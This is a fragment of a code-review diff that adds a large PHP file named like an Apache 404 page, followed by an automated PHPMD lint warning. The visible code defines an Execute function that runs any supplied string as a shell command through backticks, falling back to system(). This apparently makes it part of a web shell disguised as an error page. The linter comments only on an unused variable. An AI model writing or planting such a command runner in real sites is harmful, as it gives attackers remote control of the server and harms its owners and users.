030_404-Apache_L312.php

```
@@ -0,0 +1,1184 @@
+}
+function Execute($x)
+{
+	$x=$x.' 2>&1';
+	if(!is_null($backtic=`$x`))
+	{
+		return $backtic;
+	}
+	elseif(function_exists('system'))
+	{
+		ob_start();
+		$system=system($x);
```

PHPMD (2.15.0)

Avoid unused local variables such as '$system'. (undefined)

(UnusedLocalVariable)